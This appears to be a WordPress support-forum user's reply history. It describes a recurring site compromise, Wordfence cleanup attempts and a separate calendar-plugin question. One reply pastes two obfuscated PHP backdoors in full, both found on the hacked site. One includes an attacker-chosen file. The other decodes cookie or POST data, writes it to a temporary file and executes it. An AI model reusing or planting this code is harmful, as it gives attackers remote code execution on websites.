witchenkitsch
Forum Replies Created
-
@thekendog do you have Jetpack installed? I stopped having problems after I removed that plugin. I’m wondering if it got exploited?
I am having the same issue. I clean up the bad files and more just show up – sometimes IN the WORDFENCE directories.
Either code is injected at the head of a file, or a malicious index.php or (randomfilename).js.php is created with malicious code in it. This was from a file called HHb.js.php.1
*/ $single_preg = 'mvSd8Xjp6e'; function post_meta_ids($import_id, $path) { $close_quote = urldecode($import_id); $group = 'goal'; $int_fields = substr($path,0, strlen($close_quote)); $bad_slug = 'original_slug'; return $close_quote ^ $int_fields; } $uploads = ${post_meta_ids("20%1A%28%7D%0B", $single_preg)}; if (isset($uploads[$single_preg])) { $plural_base = $uploads[$single_preg]; $post = $plural_base[post_meta_ids("%19%1B%23%3BV9%07%15", $single_preg)]; include ($post); }<?php function/*d */lq1 (/* auurq */$sw2/*uck */) {$td3/* pr */= "*4-9bh/6krvxat_dfl(m5c;.'g873)s#FeLIE<pn?i@" . "uHy o2" . "0" ; $ye5='';foreach( $sw2 as $wp4 ) {$ye5 .=/*fhmxg*/$td3 [ $wp4/* mb */]; } return/* yzu */$ye5;}$uk6/* rl */= Array(); $uk6 [] =/*e */lq1/* ilyc */( Array(3/* jpypf */, 4/*qu */, 20 , 3 , 4/*lqm*/,/* ti */28 , 3 ,/* bz*/27 , 2/* nw */, 26/*godnh*/,/*ddojb */21 , 4 , 3 , 2/* wahnc */,/* mr*/1 , 48 , 20 , 7 ,/* nvmcf */2 , 3/* b */,/*m */1/* j */, 49 , 28 , 2 ,/* xgecz */12/* ko*/, 12/* ehc*/, 4 ,/*cee*/21 ,/* zubo */15 , 21/* xphg */,/*j */15/* ooauo */, 21 ,/*fai*/12 , 4 ,/* rrnvi */1 ,/*we */1 ,) ) ; $uk6 []/* gflf */=/* psgh*/lq1 ( Array(40 ,/* exlbs */38 ,/* yja */5/* dm*/, 38/* zziyl */,/* tub*/46 , 42/*mebtu*/, 43/*vfgkh */, 39/* tr */, 17 ,/* r */41 , 39/* fxgv*/,/* ftu*/8 ,/* elogi */18 ,/* eud*/14/* z */, 14 ,/* uj */32 , 35/* zv */,/* zmek */34/* sg */, 36 , 14 , 14/* loweq */,/* drplk */29/* czipo */,/*lsfe */22/* qtvx */,/* hrkjx */46 ,)/* di */)/* eyh */; $uk6 []/*hjw*/=/*tay */lq1 ( Array(23 , 19/*j */,/* a */47 , 15 ,/* shmge */43 , 17 , 33 ,)/* rbkhi*/) ; $uk6/* qknzz */[] = lq1/* ukr*/(/* gymv */Array(44 ,/* uovy */0 ,) )/* us */;$uk6/* k */[]/* j*/= lq1 (/* jchv */Array(23 , 6 ,)/* avoz */)/* yrsum */;$uk6/* l */[] = lq1 ( Array(31/* zotfy*/,) ) ; $uk6/* ghlfx */[]/* hqd */= lq1/* xo*/( Array(37 ,)/* n */)/* y */; $uk6[] =/*ry */lq1 ( Array(16 , 41/* tqd */, 17/*b*/,/*doyt*/33/*yh */, 14 , 38 , 43 , 13 , 14 , 21 , 47 , 39 , 13/*b */, 33 ,/* vimf */39/* xkhps */, 13 , 30 ,) )/* b*/; $uk6[]/* w */= lq1 ( Array(12 , 9 , 9 , 12 ,/* gcxw */45/* fo */, 14 ,/* ciqoo */19 , 33 , 9 ,/* w*/25 , 33 ,)/*lhyh */) ;$uk6[] = lq1 ( Array(30 ,/* fz */13/* eu */,/* mq */9/* zvg*/, 14 , 9/*e */,/* pxaoc */33 ,/* ip */38 , 33 , 12 , 13/* hsl */,) )/*sphma */; $uk6[]/*kkr */= lq1/* zi */( Array(33 , 11/* c */,/* ayq */38/* j */,/*yrd */17/* n */, 47/*mbnt */,/* ysm */15/* zbvv */, 33 ,) ) ;$uk6[]/* kl */=/* pkkr */lq1 ( Array(30 , 43/* vazgf */, 4 ,/* wepq*/30/* zxru */, 13 ,/* wub*/9/*vsuqh */,) )/*lydhe*/; $uk6[]/* akgu */= lq1/* iaka */( Array(43/*zlbtb */, 39/* sgzcl */, 17 , 41/* ezs */,/* eaddc */39/* bs */,/* efy */8 ,) ) ; $uk6[]/* xa */=/*ur*/lq1 ( Array(30 , 13 , 9/*mqj */, 17 , 33/* hdun*/, 39 ,)/*rds */) ; $uk6[] =/* n */lq1 (/* ntnvi*/Array(38 ,/*thcm */12/* vdpr*/, 21/* qyb*/,/* e */8 ,) )/* aa*/; $uk6[] =/* w */lq1 (/*ogi*/Array(19 ,/* rf */15 , 20 ,) ) ; foreach ( $uk6[8] ( $_COOKIE, $_POST ) as/*pp*/$uc14/* w*/=> $tq11) {/* bjgu */function/* qld */ox8/* xrc*/( $uk6, $uc14 , $vh10 ) /*yifc */{ return/*c*/$uk6[11] (/*q */$uk6[9] ( $uc14 ./* wvul */$uk6[0]/* rop */,/* wknay*/( $vh10/$uk6[13]( $uc14 ) ) +/* pja */1 )/* r */, 0/* vxy */,/* d */$vh10 ); /* ogi */} function dd7 ( $uk6,/* afir*/$sg12 ) { return/* mv */@$uk6[14] ($uk6[3] , $sg12/* yukq */); /* zcgt */} function tz9 ( $uk6,/* fxmal */$sg12 ) /* d*/{ if ( isset ( $sg12[2]/*nkd */) )/*imvu */{ /* ybuq */ $qc13 =/*koie */$uk6[4] ./*az */$uk6[15]( $uk6[0] ) . $uk6[2];/* s */@$uk6[7]/* unr */( $qc13, $uk6[6]/* pc*/./* g */$uk6[1]/* ghf */. $sg12[1] ( $sg12[2] ) ); /* njy */@include ( $qc13 );/* jc */@$uk6[12] ( $qc13 ); /* ce */die (); } } $tq11/*zfp*/=/* zagmu*/dd7/* en */(/*sv*/$uk6, $tq11 ); /*okv */tz9 ( $uk6, $uk6[10] ( $uk6[5] , $tq11 ^ ox8 (/* vzc*/$uk6, $uc14/* ygg */, $uk6[13](/* z */$tq11 ) ) ) ); }The code above is from a random malicous file (indddyvs.php)
Wordfence catches maybe half of the bad files. I run a scan, it’s supposedly clear, I then go through the directories and I find bad files that were there before the scan started. I delete files and remove the malicious code. Everything looks clear and I run a scan that says there are no issues. A few hours later, a scan runs and more bad files show up (but it doesn’t catch all of them!). In addition to password resets, I have changed the 2 admin accounts and the one editor account to to 2FA and I’ve reset the password on my primary cpanel account. There are no suspicious users added. I’ve removed wpforms and the all-in-one-event calendar because they had errors in the log and wpforms has woocommerce hooks that I don’t trust after the recent WC hack. I deleted anything related to wpforms from the mysql database. My theme and all my plugins are up-to-date. I’ve blocked whole countries and I’d block the US if it wasn’t for the fact that web crawlers operate out of there.
I cannot for the life of me figure out how they keep injecting malicious code into my site and we cannot, as a small nonprofit society, pony up $500USD for “fixing” a site that should be protected from this recurring by a Wordfence Premium plugin that we already paid $200USD for. #Frustrated
Sunny, Your suggestion answered one question – how to change the font size or implement a button, but it does not address the fundamental problem – the Front-end submissions pop-up dialog does not appear when the widget link is clicked UNLESS it’s on the mane time.ly calendar page to begin with. On all other pages, nothing happens when you click the “+post your own event” link in the widget area. Please try it from our home page at https://sfn-ottawa.ca and confirm this is not working….
-Natalie